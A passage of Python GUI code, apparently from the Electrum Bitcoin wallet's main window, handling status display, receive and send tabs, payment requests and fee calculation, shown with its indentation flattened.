if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
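    # Sketch of the coupling above: when one edit is updated programmatically, its
    # `follows` flag is set first, so the other edit's textChanged handler returns
    # early and the BTC/fiat fields do not keep re-triggering each other.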
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = expiration_values[i][1]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
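# Fee slider callback: persist the selected fee level (dynamic fees) or fee rate
# (static fees), mirror the rate into the feerate field, and recompute the fee.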
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
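# Recolor the amount/fee/feerate fields: red when funds are insufficient
# (mentioning any frozen balance in the status bar), blue for values that were
# auto-filled rather than edited by the user.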
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return "{}...{}:{}\t{}".format(h[0:10], h[-10:], x.get('prevout_n'), x.get('address'))
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
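# A fee (or feerate) field counts as 'frozen' when it is visible and was edited
# by the user, so the automatic fee calculation must not overwrite it.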
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
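# Return the fee estimator for the send tab: a fixed amount if the fee field is
# frozen, a per-kilobyte estimator if the feerate field is frozen, or None to
# fall back to the config defaults.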
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
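# Build the unsigned transaction, check its fee against the server relay fee,
# ask the user to confirm (entering the password if needed), then sign and
# broadcast - or just show the transaction when previewing.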
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
